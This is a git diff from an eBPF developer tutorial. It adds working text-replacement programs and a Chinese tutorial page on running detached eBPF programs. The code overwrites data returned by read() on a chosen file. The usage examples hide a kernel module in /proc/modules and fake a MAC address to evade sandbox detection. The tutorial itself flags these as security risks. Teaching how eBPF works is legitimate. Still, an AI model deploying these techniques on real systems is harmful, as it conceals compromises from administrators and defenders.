our target file + size_t pid_tgid = bpf_get_current_pid_tgid(); + long unsigned int* pbuff_addr = bpf_map_lookup_elem(&map_buff_addrs, &pid_tgid); + if (pbuff_addr == 0) { + return 0; + } + int pid = pid_tgid >> 32; + long unsigned int buff_addr = *pbuff_addr; + long unsigned int name_addr = 0; + if (buff_addr <= 0) { + return 0; + } + + // This is amount of data returned from the read syscall + if (ctx->ret <= 0) { + return 0; + } + long int buff_size = ctx->ret; + unsigned long int read_size = buff_size; + + bpf_printk("[TEXT_REPLACE] PID %d | read_size %lu | buff_addr 0x%lx\n", pid, read_size, buff_addr); + // 64 may be to large for loop + char local_buff[LOCAL_BUFF_SIZE] = { 0x00 }; + + if (read_size > (LOCAL_BUFF_SIZE+1)) { + // Need to loop :-( + read_size = LOCAL_BUFF_SIZE; + } + + // Read the data returned in chunks, and note every instance + // of the first character of our 'to find' text. + // This is all very convoluted, but is required to keep + // the program complexity and size low enough the pass the verifier checks + unsigned int tofind_counter = 0; + for (unsigned int i = 0; i < loop_size; i++) { + // Read in chunks from buffer + bpf_probe_read(&local_buff, read_size, (void*)buff_addr); + for (unsigned int j = 0; j < LOCAL_BUFF_SIZE; j++) { + // Look for the first char of our 'to find' text + if (local_buff[j] == text_find[0]) { + name_addr = buff_addr+j; + // This is possibly out text, add the address to the map to be + // checked by program 'check_possible_addrs' + bpf_map_update_elem(&map_name_addrs, &tofind_counter, &name_addr, BPF_ANY); + tofind_counter++; + } + } + + buff_addr += LOCAL_BUFF_SIZE; + } + + // Tail-call into 'check_possible_addrs' to loop over possible addresses + bpf_printk("[TEXT_REPLACE] PID %d | tofind_counter %d \n", pid, tofind_counter); + + bpf_tail_call(ctx, &map_prog_array, PROG_01); + return 0; +} + +SEC("tp/syscalls/sys_exit_read") +int check_possible_addresses(struct trace_event_raw_sys_exit *ctx) { + // Check this open call is opening our target file + size_t pid_tgid = bpf_get_current_pid_tgid(); + long unsigned int* pbuff_addr = bpf_map_lookup_elem(&map_buff_addrs, &pid_tgid); + if (pbuff_addr == 0) { + return 0; + } + int pid = pid_tgid >> 32; + long unsigned int* pName_addr = 0; + long unsigned int name_addr = 0; + unsigned int newline_counter = 0; + unsigned int match_counter = 0; + + char name[text_len_max+1]; + unsigned int j = 0; + char old = 0; + const unsigned int name_len = text_len; + if (name_len < 0) { + return 0; + } + if (name_len > text_len_max) { + return 0; + } + // Go over every possibly location + // and check if it really does match our text + for (unsigned int i = 0; i < MAX_POSSIBLE_ADDRS; i++) { + newline_counter = i; + pName_addr = bpf_map_lookup_elem(&map_name_addrs, &newline_counter); + if (pName_addr == 0) { + break; + } + name_addr = *pName_addr; + if (name_addr == 0) { + break; + } + bpf_probe_read_user(&name, text_len_max, (char*)name_addr); + // for (j = 0; j < text_len_max; j++) { + // if (name[j] != text_find[j]) { + // break; + // } + // } + // we can use bpf_strncmp here, but it's not available in the kernel version older + if (bpf_strncmp(name, text_len_max, (const char *)text_find) == 0) { + // *********** + // We've found out text! + // Add location to map to be overwritten + // *********** + bpf_map_update_elem(&map_to_replace_addrs, &match_counter, &name_addr, BPF_ANY); + match_counter++; + } + bpf_map_delete_elem(&map_name_addrs, &newline_counter); + } + + // If we found at least one match, jump into program to overwrite text + if (match_counter > 0) { + bpf_tail_call(ctx, &map_prog_array, PROG_02); + } + return 0; +} + +SEC("tp/syscalls/sys_exit_read") +int overwrite_addresses(struct trace_event_raw_sys_exit *ctx) { + // Check this open call is opening our target file + size_t pid_tgid = bpf_get_current_pid_tgid(); + long unsigned int* pbuff_addr = bpf_map_lookup_elem(&map_buff_addrs, &pid_tgid); + if (pbuff_addr == 0) { + return 0; + } + int pid = pid_tgid >> 32; + long unsigned int* pName_addr = 0; + long unsigned int name_addr = 0; + unsigned int match_counter = 0; + + // Loop over every address to replace text into + for (unsigned int i = 0; i < MAX_POSSIBLE_ADDRS; i++) { + match_counter = i; + pName_addr = bpf_map_lookup_elem(&map_to_replace_addrs, &match_counter); + if (pName_addr == 0) { + break; + } + name_addr = *pName_addr; + if (name_addr == 0) { + break; + } + + // Attempt to overwrite data with out replace string (minus the end null bytes) + long ret = bpf_probe_write_user((void*)name_addr, (void*)text_replace, text_len); + // Send event + struct event *e; + e = bpf_ringbuf_reserve(&rb, sizeof(*e), 0); + if (e) { + e->success = (ret == 0); + e->pid = pid; + bpf_get_current_comm(&e->comm, sizeof(e->comm)); + bpf_ringbuf_submit(e, 0); + } + bpf_printk("[TEXT_REPLACE] PID %d | [*] replaced: %s\n", pid, text_find); + + // Clean up map now we're done + bpf_map_delete_elem(&map_to_replace_addrs, &match_counter); + } + + return 0; +} diff --git a/27-replace/replace.c b/27-replace/replace.c new file mode 100644 index 0000000..4e139e1 --- /dev/null +++ b/27-replace/replace.c @@ -0,0 +1,269 @@ +// SPDX-License-Identifier: BSD-3-Clause +#include +#include +#include "replace.skel.h" +#include "common.h" + + +#include +#include +#include +#include +#include +#include +#include + +static volatile sig_atomic_t exiting; + +void sig_int(int signo) +{ + exiting = 1; +} + +static bool setup_sig_handler() { + // Add handlers for SIGINT and SIGTERM so we shutdown cleanly + __sighandler_t sighandler = signal(SIGINT, sig_int); + if (sighandler == SIG_ERR) { + fprintf(stderr, "can't set signal handler: %s\n", strerror(errno)); + return false; + } + sighandler = signal(SIGTERM, sig_int); + if (sighandler == SIG_ERR) { + fprintf(stderr, "can't set signal handler: %s\n", strerror(errno)); + return false; + } + return true; +} + +static int libbpf_print_fn(enum libbpf_print_level level, const char *format, va_list args) +{ + return vfprintf(stderr, format, args); +} + +static bool bump_memlock_rlimit(void) +{ + struct rlimit rlim_new = { + .rlim_cur = RLIM_INFINITY, + .rlim_max = RLIM_INFINITY, + }; + + if (setrlimit(RLIMIT_MEMLOCK, &rlim_new)) { + fprintf(stderr, "Failed to increase RLIMIT_MEMLOCK limit! (hint: run as root)\n"); + return false; + } + return true; +} + + +static bool setup() { + // Set up libbpf errors and debug info callback + libbpf_set_print(libbpf_print_fn); + + // Bump RLIMIT_MEMLOCK to allow BPF sub-system to do anything + if (!bump_memlock_rlimit()) { + return false; + }; + + // Setup signal handler so we exit cleanly + if (!setup_sig_handler()) { + return false; + } + + return true; +} + +// Setup Argument stuff +#define filename_len_max 50 +#define text_len_max 20 +static struct env { + char filename[filename_len_max]; + char input[filename_len_max]; + char replace[filename_len_max]; + int target_ppid; +} env; + +const char *argp_program_version = "textreplace 1.0"; +const char *argp_program_bug_address = ""; +const char argp_program_doc[] = +"Text Replace\n" +"\n" +"Replaces text in a file.\n" +"To pass in newlines use \%'\\n' e.g.:\n" +" ./textreplace -f /proc/modules -i ppdev -r $'aaaa\\n'" +"\n" +"USAGE: ./textreplace -f filename -i input -r output [-t 1111]\n" +"EXAMPLES:\n" +"Hide kernel module:\n" +" ./textreplace -f /proc/modules -i 'joydev' -r 'cryptd'\n" +"Fake Ethernet adapter (used in sandbox detection): \n" +" ./textreplace -f /sys/class/net/eth0/address -i '00:15:5d:01:ca:05' -r '00:00:00:00:00:00' \n" +""; + +static const struct argp_option opts[] = { + { "filename", 'f', "FILENAME", 0, "Path to file to replace text in" }, + { "input", 'i', "INPUT", 0, "Text to be replaced in file, max 20 chars" }, + { "replace", 'r', "REPLACE", 0, "Text to replace with in file, must be same size as -t" }, + { "target-ppid", 't', "PPID", 0, "Optional Parent PID, will only affect its children." }, + {}, +}; +static error_t parse_arg(int key, char *arg, struct argp_state *state) +{ + switch (key) { + case 'i': + if (strlen(arg) >= text_len_max) { + fprintf(stderr, "Text must be less than %d characters\n", filename_len_max); + argp_usage(state); + } + strncpy(env.input, arg, sizeof(env.input)); + break; + case 'r': + if (strlen(arg) >= text_len_max) { + fprintf(stderr, "Text must be less than %d characters\n", filename_len_max); + argp_usage(state); + } + strncpy(env.replace, arg, sizeof(env.replace)); + break; + case 'f': + if (strlen(arg) >= filename_len_max) { + fprintf(stderr, "Filename must be less than %d characters\n", filename_len_max); + argp_usage(state); + } + strncpy(env.filename, arg, sizeof(env.filename)); + break; + case 't': + errno = 0; + env.target_ppid = strtol(arg, NULL, 10); + if (errno || env.target_ppid <= 0) { + fprintf(stderr, "Invalid pid: %s\n", arg); + argp_usage(state); + } + break; + case ARGP_KEY_ARG: + argp_usage(state); + break; + default: + return ARGP_ERR_UNKNOWN; + } + return 0; +} +static const struct argp argp = { + .options = opts, + .parser = parse_arg, + .doc = argp_program_doc, +}; + +static int handle_event(void *ctx, void *data, size_t data_sz) +{ + const struct event *e = data; + if (e->success) + printf("Replaced text in PID %d (%s)\n", e->pid, e->comm); + else + printf("Failed to replace text in PID %d (%s)\n", e->pid, e->comm); + return 0; +} + +int main(int argc, char **argv) +{ + struct ring_buffer *rb = NULL; + struct replace_bpf *skel; + int err; + + // Parse command line arguments + err = argp_parse(&argp, argc, argv, 0, NULL, NULL); + if (err) { + return err; + } + if (env.filename[0] == '\x00' || env.input[0] == '\x00' || env.replace[0] == '\x00') { + printf("ERROR: filename, input, and replace all requried, see %s --help\n", argv[0]); + exit(1); + } + if (strlen(env.input) != strlen(env.replace)) { + printf("ERROR: input and replace text must be the same length\n"); + exit(1); + } + + // Do common setup + if (!setup()) { + exit(1); + } + + // Open BPF application + skel = replace_bpf__open(); + if (!skel) { + fprintf(stderr, "Failed to open BPF program: %s\n", strerror(errno)); + return 1; + } + + // Let bpf program know our pid so we don't get kiled by it + strncpy(skel->rodata->filename, env.filename, sizeof(skel->rodata->filename)); + skel->rodata->filename_len = strlen(env.filename); + skel->rodata->target_ppid = env.target_ppid; + + strncpy(skel->rodata->text_find, env.input, sizeof(skel->rodata->text_find)); + strncpy(skel->rodata->text_replace, env.replace, sizeof(skel->rodata->text_replace)); + skel->rodata->text_len = strlen(env.input); + + // Verify and load program + err = replace_bpf__load(skel); + if (err) { + fprintf(stderr, "Failed to load and verify BPF skeleton\n"); + goto cleanup; + } + + // Add program to map so we can call it later + int index = PROG_01; + int prog_fd = bpf_program__fd(skel->progs.check_possible_addresses); + int ret = bpf_map_update_elem( + bpf_map__fd(skel->maps.map_prog_array), + &index, + &prog_fd, + BPF_ANY); + if (ret == -1) { + printf("Failed to add program to prog array! %s\n", strerror(errno)); + goto cleanup; + } + index = PROG_02; + prog_fd = bpf_program__fd(skel->progs.overwrite_addresses); + ret = bpf_map_update_elem( + bpf_map__fd(skel->maps.map_prog_array), + &index, + &prog_fd, + BPF_ANY); + if (ret == -1) { + printf("Failed to add program to prog array! %s\n", strerror(errno)); + goto cleanup; + } + + // Attach tracepoint handler + err = replace_bpf__attach( skel); + if (err) { + fprintf(stderr, "Failed to attach BPF program: %s\n", strerror(errno)); + goto cleanup; + } + + // Set up ring buffer + rb = ring_buffer__new(bpf_map__fd( skel->maps.rb), handle_event, NULL, NULL); + if (!rb) { + err = -1; + fprintf(stderr, "Failed to create ring buffer\n"); + goto cleanup; + } + + printf("Successfully started!\n"); + while (!exiting) { + err = ring_buffer__poll(rb, 100 /* timeout, ms */); + /* Ctrl-C will cause -EINTR */ + if (err == -EINTR) { + err = 0; + break; + } + if (err < 0) { + printf("Error polling perf buffer: %d\n", err); + break; + } + } + +cleanup: + replace_bpf__destroy( skel); + return -err; +} diff --git a/28-detach/.gitignore b/28-detach/.gitignore new file mode 100644 index 0000000..81acd4b --- /dev/null +++ b/28-detach/.gitignore @@ -0,0 +1,9 @@ +.vscode +package.json +*.o +*.skel.json +*.skel.yaml +package.yaml +ecli +bootstrap +textreplace2 diff --git a/28-detach/LICENSE b/28-detach/LICENSE new file mode 100644 index 0000000..47fc3a4 --- /dev/null +++ b/28-detach/LICENSE @@ -0,0 +1,29 @@ +BSD 3-Clause License + +Copyright (c) 2020, Andrii Nakryiko +All rights reserved. + +Redistribution and use in source and binary forms, with or without +modification, are permitted provided that the following conditions are met: + +1. Redistributions of source code must retain the above copyright notice, this + list of conditions and the following disclaimer. + +2. Redistributions in binary form must reproduce the above copyright notice, + this list of conditions and the following disclaimer in the documentation + and/or other materials provided with the distribution. + +3. Neither the name of the copyright holder nor the names of its + contributors may be used to endorse or promote products derived from + this software without specific prior written permission. + +THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" +AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE +IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE +DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE +FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL +DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR +SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER +CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, +OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE +OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. diff --git a/28-detach/Makefile b/28-detach/Makefile new file mode 100644 index 0000000..ecfd9e1 --- /dev/null +++ b/28-detach/Makefile @@ -0,0 +1,141 @@ +# SPDX-License-Identifier: (LGPL-2.1 OR BSD-2-Clause) +OUTPUT := .output +CLANG ?= clang +LIBBPF_SRC := $(abspath ../../libbpf/src) +BPFTOOL_SRC := $(abspath ../../bpftool/src) +LIBBPF_OBJ := $(abspath $(OUTPUT)/libbpf.a) +BPFTOOL_OUTPUT ?= $(abspath $(OUTPUT)/bpftool) +BPFTOOL ?= $(BPFTOOL_OUTPUT)/bootstrap/bpftool +LIBBLAZESYM_SRC := $(abspath ../../blazesym/) +LIBBLAZESYM_OBJ := $(abspath $(OUTPUT)/libblazesym.a) +LIBBLAZESYM_HEADER := $(abspath $(OUTPUT)/blazesym.h) +ARCH ?= $(shell uname -m | sed 's/x86_64/x86/' \ + | sed 's/arm.*/arm/' \ + | sed 's/aarch64/arm64/' \ + | sed 's/ppc64le/powerpc/' \ + | sed 's/mips.*/mips/' \ + | sed 's/riscv64/riscv/' \ + | sed 's/loongarch64/loongarch/') +VMLINUX := ../../vmlinux/$(ARCH)/vmlinux.h +# Use our own libbpf API headers and Linux UAPI headers distributed with +# libbpf to avoid dependency on system-wide headers, which could be missing or +# outdated +INCLUDES := -I$(OUTPUT) -I../../libbpf/include/uapi -I$(dir $(VMLINUX)) +CFLAGS := -g -Wall +ALL_LDFLAGS := $(LDFLAGS) $(EXTRA_LDFLAGS) + +APPS = textreplace2 # minimal minimal_legacy uprobe kprobe fentry usdt sockfilter tc ksyscall + +CARGO ?= $(shell which cargo) +ifeq ($(strip $(CARGO)),) +BZS_APPS := +else +BZS_APPS := # profile +APPS += $(BZS_APPS) +# Required by libblazesym +ALL_LDFLAGS += -lrt -ldl -lpthread -lm +endif + +# Get Clang's default includes on this system. We'll explicitly add these dirs +# to the includes list when compiling with `-target bpf` because otherwise some +# architecture-specific dirs will be "missing" on some architectures/distros - +# headers such as asm/types.h, asm/byteorder.h, asm/socket.h, asm/sockios.h, +# sys/cdefs.h etc. might be missing. +# +# Use '-idirafter': Don't interfere with include mechanics except where the +# build would have failed anyways. +CLANG_BPF_SYS_INCLUDES ?= $(shell $(CLANG) -v -E - &1 \ + | sed -n '/<...> search starts here:/,/End of search list./{ s| \(/.*\)|-idirafter \1|p }') + +ifeq ($(V),1) + Q = + msg = +else + Q = @ + msg = @printf ' %-8s %s%s\n' \ + "$(1)" \ + "$(patsubst $(abspath $(OUTPUT))/%,%,$(2))" \ + "$(if $(3), $(3))"; + MAKEFLAGS += --no-print-directory +endif + +define allow-override + $(if $(or $(findstring environment,$(origin $(1))),\ + $(findstring command line,$(origin $(1)))),,\ + $(eval $(1) = $(2))) +endef + +$(call allow-override,CC,$(CROSS_COMPILE)cc) +$(call allow-override,LD,$(CROSS_COMPILE)ld) + +.PHONY: all +all: $(APPS) + +.PHONY: clean +clean: + $(call msg,CLEAN) + $(Q)rm -rf $(OUTPUT) $(APPS) + +$(OUTPUT) $(OUTPUT)/libbpf $(BPFTOOL_OUTPUT): + $(call msg,MKDIR,$@) + $(Q)mkdir -p $@ + +# Build libbpf +$(LIBBPF_OBJ): $(wildcard $(LIBBPF_SRC)/*.[ch] $(LIBBPF_SRC)/Makefile) | $(OUTPUT)/libbpf + $(call msg,LIB,$@) + $(Q)$(MAKE) -C $(LIBBPF_SRC) BUILD_STATIC_ONLY=1 \ + OBJDIR=$(dir $@)/libbpf DESTDIR=$(dir $@) \ + INCLUDEDIR= LIBDIR= UAPIDIR= \ + install + +# Build bpftool +$(BPFTOOL): | $(BPFTOOL_OUTPUT) + $(call msg,BPFTOOL,$@) + $(Q)$(MAKE) ARCH= CROSS_COMPILE= OUTPUT=$(BPFTOOL_OUTPUT)/ -C $(BPFTOOL_SRC) bootstrap + + +$(LIBBLAZESYM_SRC)/target/release/libblazesym.a:: + $(Q)cd $(LIBBLAZESYM_SRC) && $(CARGO) build --features=cheader,dont-generate-test-files --release + +$(LIBBLAZESYM_OBJ): $(LIBBLAZESYM_SRC)/target/release/libblazesym.a | $(OUTPUT) + $(call msg,LIB, $@) + $(Q)cp $(LIBBLAZESYM_SRC)/target/release/libblazesym.a $@ + +$(LIBBLAZESYM_HEADER): $(LIBBLAZESYM_SRC)/target/release/libblazesym.a | $(OUTPUT) + $(call msg,LIB,$@) + $(Q)cp $(LIBBLAZESYM_SRC)/target/release/blazesym.h $@ + +# Build BPF code +$(OUTPUT)/%.bpf.o: %.bpf.c $(LIBBPF_OBJ) $(wildcard %.h) $(VMLINUX) | $(OUTPUT) $(BPFTOOL) + $(call msg,BPF,$@) + $(Q)$(CLANG) -g -O2 -target bpf -D__TARGET_ARCH_$(ARCH) \ + $(INCLUDES) $(CLANG_BPF_SYS_INCLUDES) \ + -c $(filter %.c,$^) -o $(patsubst %.bpf.o,%.tmp.bpf.o,$@) + $(Q)$(BPFTOOL) gen object $@ $(patsubst %.bpf.o,%.tmp.bpf.o,$@) + +# Generate BPF skeletons +$(OUTPUT)/%.skel.h: $(OUTPUT)/%.bpf.o | $(OUTPUT) $(BPFTOOL) + $(call msg,GEN-SKEL,$@) + $(Q)$(BPFTOOL) gen skeleton $< > $@ + +# Build user-space code +$(patsubst %,$(OUTPUT)/%.o,$(APPS)): %.o: %.skel.h + +$(OUTPUT)/%.o: %.c $(wildcard %.h) | $(OUTPUT) + $(call msg,CC,$@) + $(Q)$(CC) $(CFLAGS) $(INCLUDES) -c $(filter %.c,$^) -o $@ + +$(patsubst %,$(OUTPUT)/%.o,$(BZS_APPS)): $(LIBBLAZESYM_HEADER) + +$(BZS_APPS): $(LIBBLAZESYM_OBJ) + +# Build application binary +$(APPS): %: $(OUTPUT)/%.o $(LIBBPF_OBJ) | $(OUTPUT) + $(call msg,BINARY,$@) + $(Q)$(CC) $(CFLAGS) $^ $(ALL_LDFLAGS) -lelf -lz -o $@ + +# delete failed targets +.DELETE_ON_ERROR: + +# keep intermediate (.skel.h, .bpf.o, etc) targets +.SECONDARY: diff --git a/28-detach/index.html b/28-detach/index.html new file mode 100644 index 0000000..aba2c30 --- /dev/null +++ b/28-detach/index.html @@ -0,0 +1,232 @@ + + + + + + BPF的生命周期:使用 Detached 模式在用户态应用退出后持续运行 eBPF 程序 - bpf-developer-tutorial + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
    + + + + + + + + + + + + + + +
    + +
    + + + + + + + + +
    +
    +

    在用户态应用退出后运行 eBPF 程序:eBPF 程序的生命周期

    +

    通过使用 detach 的方式运行 eBPF 程序,用户空间加载器可以退出,而不会停止 eBPF 程序。

    +

    eBPF 程序的生命周期

    +

    首先,我们需要了解一些关键的概念,如 BPF 对象(包括程序,地图和调试信息),文件描述符 (FD),引用计数(refcnt)等。在 eBPF 系统中,用户空间通过文件描述符访问 BPF 对象,而每个对象都有一个引用计数。当一个对象被创建时,其引用计数初始为1。如果该对象不再被使用(即没有其他程序或文件描述符引用它),它的引用计数将降至0,并在 RCU 宽限期后被内存清理。

    +

    接下来,我们需要了解 eBPF 程序的生命周期。首先,当你创建一个 BPF 程序,并将它连接到某个“钩子”(例如网络接口,系统调用等),它的引用计数会增加。然后,即使原始创建和加载该程序的用户空间进程退出,只要 BPF 程序的引用计数大于 0,它就会保持活动状态。然而,这个过程中有一个重要的点是:不是所有的钩子都是相等的。有些钩子是全局的,比如 XDP、tc's clsact 和 cgroup-based 钩子。这些全局钩子会一直保持 BPF 程序的活动状态,直到这些对象自身消失。而有些钩子是局部的,只在拥有它们的进程存活期间运行。

    +

    对于 BPF 对象(程序或映射)的生命周期管理,另一个关键的操作是“分离”(detach)。这个操作会阻止已附加程序的任何未来执行。然后,对于需要替换 BPF 程序的情况,你可以使用替换(replace)操作。这是一个复杂的过程,因为你需要确保在替换过程中,不会丢失正在处理的事件,而且新旧程序可能在不同的 CPU 上同时运行。

    +

    最后,除了通过文件描述符和引用计数来管理 BPF 对象的生命周期,还有一个叫做 BPFFS 的方法,也就是“BPF 文件系统”。用户空间进程可以在 BPFFS 中“固定”(pin)一个 BPF 程序或映射,这将增加对象的引用计数,使得即使 BPF 程序未附加到任何地方或 BPF 映射未被任何程序使用,该 BPF 对象也将保持活动状态。

    +

    所以,当我们谈论在后台运行 eBPF 程序时,我们需要清楚这个过程的含义。在某些情况下,即使用户空间进程已经退出,我们可能还希望 BPF 程序保持运行。这就需要我们正确地管理 BPF 对象的生命周期

    +

    运行

    +

    这里还是采用了上一个的字符串替换的应用,来体现对应可能的安全风险。通过使用 --detach 运行程序,用户空间加载器可以退出,而不会停止 eBPF 程序。

    +

    编译:

    +
    make
    +
    +

    在运行前,请首先确保 bpf 文件系统已经被挂载:

    +
    sudo mount bpffs -t bpf /sys/fs/bpf
    +mkdir /sys/fs/bpf/textreplace
    +
    +

    然后,你可以分离运行 text-replace2:

    +
    ./textreplace2 -f /proc/modules -i 'joydev' -r 'cryptd' -d
    +
    +

    这将在 /sys/fs/bpf/textreplace 下创建一些 eBPF 链接文件。 +一旦加载器成功运行,你可以通过运行以下命令检查日志:

    +
    sudo cat /sys/kernel/debug/tracing/trace_pipe
    +# 确认链接文件存在
    +sudo ls -l /sys/fs/bpf/textreplace
    +
    +

    然后,要停止,只需删除链接文件即可:

    +
    sudo rm -r /sys/fs/bpf/textreplace
    +
    +

    参考资料

    + + +
    + + +
    +
    + + + +
    + + + + + + + + + + + + + + + + + + +
    + + diff --git a/28-detach/textreplace2.bpf.c b/28-detach/textreplace2.bpf.c new file mode 100644 index 0000000..6778d7c --- /dev/null +++ b/28-detach/textreplace2.bpf.c @@ -0,0 +1,384 @@ +// SPDX-License-Identifier: BSD-3-Clause +#include "vmlinux.h" +#include +#include +#include +#include "textreplace2.h" + +char LICENSE[] SEC("license") = "Dual BSD/GPL"; + +// Ringbuffer Map to pass messages from kernel to user +struct { + __uint(type, BPF_MAP_TYPE_RINGBUF); + __uint(max_entries, 256 * 1024); +} rb SEC(".maps"); + +// Map to hold the File Descriptors from 'openat' calls +struct { + __uint(type, BPF_MAP_TYPE_HASH); + __uint(max_entries, 8192); + __type(key, size_t); + __type(value, unsigned int); +} map_fds SEC(".maps"); + +// Map to fold the buffer sized from 'read' calls +struct { + __uint(type, BPF_MAP_TYPE_HASH); + __uint(max_entries, 8192); + __type(key, size_t); + __type(value, long unsigned int); +} map_buff_addrs SEC(".maps"); + +// Map to fold the buffer sized from 'read' calls +// NOTE: This should probably be a map-of-maps, with the top-level +// key bing pid_tgid, so we know we're looking at the right program +#define MAX_POSSIBLE_ADDRS 500 +struct { + __uint(type, BPF_MAP_TYPE_ARRAY); + __uint(max_entries, MAX_POSSIBLE_ADDRS); + __type(key, unsigned int); + __type(value, long unsigned int); +} map_name_addrs SEC(".maps"); +struct { + __uint(type, BPF_MAP_TYPE_ARRAY); + __uint(max_entries, MAX_POSSIBLE_ADDRS); + __type(key, unsigned int); + __type(value, long unsigned int); +} map_to_replace_addrs SEC(".maps"); + +// Map holding the programs for tail calls +struct { + __uint(type, BPF_MAP_TYPE_PROG_ARRAY); + __uint(max_entries, 5); + __type(key, __u32); + __type(value, __u32); +} map_prog_array SEC(".maps"); + +// Optional Target Parent PID +const volatile int target_ppid = 0; + +struct { + __uint(type, BPF_MAP_TYPE_ARRAY); + __uint(max_entries, 1); + __type(key, int); + __type(value, struct tr_file); +} map_filename SEC(".maps"); +struct { + __uint(type, BPF_MAP_TYPE_ARRAY); + __uint(max_entries, 2); + __type(key, int); + __type(value, struct tr_text); +} map_text SEC(".maps"); + +SEC("fexit/__x64_sys_close") +int BPF_PROG(handle_close_exit, const struct pt_regs *regs, long ret) +{ + // Check if we're a process thread of interest + size_t pid_tgid = bpf_get_current_pid_tgid(); + int pid = pid_tgid >> 32; + unsigned int* check = bpf_map_lookup_elem(&map_fds, &pid_tgid); + if (check == 0) { + return 0; + } + + // Closing file, delete fd from all maps to clean up + bpf_map_delete_elem(&map_fds, &pid_tgid); + bpf_map_delete_elem(&map_buff_addrs, &pid_tgid); + + return 0; +} + +SEC("fentry/__x64_sys_openat") +int BPF_PROG(handle_openat_enter, struct pt_regs *regs) +{ + size_t pid_tgid = bpf_get_current_pid_tgid(); + int pid = pid_tgid >> 32; + unsigned int zero = PROG_00; + // Check if we're a process thread of interest + // if target_ppid is 0 then we target all pids + if (target_ppid != 0) { + struct task_struct *task = (struct task_struct *)bpf_get_current_task(); + int ppid = BPF_CORE_READ(task, real_parent, tgid); + if (ppid != target_ppid) { + return 0; + } + } + + // Get filename to check + struct tr_file *pFile = bpf_map_lookup_elem(&map_filename, &zero); + if (pFile == NULL) { + return 0; + } + + // Get filename from arguments + char check_filename[FILENAME_LEN_MAX]; + bpf_probe_read_user(&check_filename, FILENAME_LEN_MAX, (void*)PT_REGS_PARM2(regs)); + + // Check filename is our target + for (int i = 0; i < FILENAME_LEN_MAX; i++) { + if (i > pFile->filename_len) { + break; + } + if (pFile->filename[i] != check_filename[i]) { + return 0; + } + } + + // Add pid_tgid to map for our sys_exit call + bpf_map_update_elem(&map_fds, &pid_tgid, &zero, BPF_ANY); + + return 0; +} + +SEC("fexit/__x64_sys_openat") +int BPF_PROG(handle_openat_exit, struct pt_regs *regs, long ret) +{ + // Check this open call is opening our target file + size_t pid_tgid = bpf_get_current_pid_tgid(); + unsigned int* check = bpf_map_lookup_elem(&map_fds, &pid_tgid); + if (check == 0) { + return 0; + } + int pid = pid_tgid >> 32; + + // Set the map value to be the returned file descriptor + unsigned int fd = (unsigned int)ret; + bpf_map_update_elem(&map_fds, &pid_tgid, &fd, BPF_ANY); + + return 0; +} + +SEC("fentry/__x64_sys_read") +int BPF_PROG(handle_read_enter, struct pt_regs *regs) +{ + // Check this open call is opening our target file + size_t pid_tgid = bpf_get_current_pid_tgid(); + int pid = pid_tgid >> 32; + unsigned int* pfd = bpf_map_lookup_elem(&map_fds, &pid_tgid); + if (pfd == 0) { + return 0; + } + + // Check this is the correct file descriptor + unsigned int map_fd = *pfd; + unsigned int fd = (unsigned int)PT_REGS_PARM1(regs); + if (map_fd != fd) { + return 0; + } + + // Store buffer address from arguments in map + long unsigned int buff_addr = PT_REGS_PARM2(regs); + bpf_map_update_elem(&map_buff_addrs, &pid_tgid, &buff_addr, BPF_ANY); + + // log and exit + size_t buff_size = (size_t)PT_REGS_PARM3(regs); + // bpf_printk("[TEXT_REPLACE] PID %d | fd %d | buff_addr 0x%lx\n", pid, fd, buff_addr); + // bpf_printk("[TEXT_REPLACE] PID %d | fd %d | buff_size %lu\n", pid, fd, buff_size); + return 0; +} + +SEC("fexit/__x64_sys_read") +int BPF_PROG(find_possible_addrs, struct pt_regs *regs, long ret) +{ + // Check this open call is reading our target file + size_t pid_tgid = bpf_get_current_pid_tgid(); + long unsigned int* pbuff_addr = bpf_map_lookup_elem(&map_buff_addrs, &pid_tgid); + if (pbuff_addr == 0) { + return 0; + } + int pid = pid_tgid >> 32; + long unsigned int buff_addr = *pbuff_addr; + long unsigned int name_addr = 0; + if (buff_addr <= 0) { + return 0; + } + + // This is amount of data returned from the read syscall + if (ret <= 0) { + return 0; + } + long int buff_size = ret; + long int read_size = buff_size; + + bpf_printk("[TEXT_REPLACE] PID %d | read_size %lu | buff_addr 0x%lx\n", pid, read_size, buff_addr); + const unsigned int local_buff_size = 32; + const unsigned int loop_size = 32; + char local_buff[local_buff_size] = { 0x00 }; + + if (read_size > (local_buff_size+1)) { + // Need to loop :-( + read_size = local_buff_size; + } + + int index = PROG_00; + struct tr_text *pFind = bpf_map_lookup_elem(&map_text, &index); + if (pFind == NULL) { + return 0; + } + + // Read the data returned in chunks, and note every instance + // of the first character of our 'to find' text. + // This is all very convoluted, but is required to keep + // the program complexity and size low enough the pass the verifier checks + unsigned int tofind_counter = 0; + for (unsigned int i = 0; i < loop_size; i++) { + // Read in chunks from buffer + bpf_probe_read(&local_buff, read_size, (void*)buff_addr); + for (unsigned int j = 0; j < local_buff_size; j++) { + // Look for the first char of our 'to find' text + if (local_buff[j] == pFind->text[0]) { + name_addr = buff_addr+j; + // This is possibly out text, add the address to the map to be + // checked by program 'check_possible_addrs' + bpf_map_update_elem(&map_name_addrs, &tofind_counter, &name_addr, BPF_ANY); + tofind_counter++; + } + } + + buff_addr += local_buff_size; + } + + // Tail-call into 'check_possible_addrs' to loop over possible addresses + // bpf_printk("[TEXT_REPLACE] PID %d | tofind_counter %d \n", pid, tofind_counter); + + bpf_tail_call(ctx, &map_prog_array, PROG_01); + return 0; +} + +SEC("fexit/__x64_sys_read") +int BPF_PROG(check_possible_addresses, struct pt_regs *regs, long ret) +{ + // Check this open call is opening our 